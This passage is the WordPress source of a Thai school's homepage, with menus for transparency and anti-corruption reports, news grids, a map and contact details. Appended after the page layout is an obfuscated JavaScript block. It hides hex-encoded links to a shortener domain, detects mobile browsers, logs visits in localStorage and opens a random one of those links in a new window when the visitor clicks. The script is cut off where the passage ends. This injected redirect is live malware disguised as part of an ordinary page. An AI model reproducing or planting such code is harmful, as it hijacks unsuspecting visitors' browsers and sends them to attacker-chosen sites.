900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 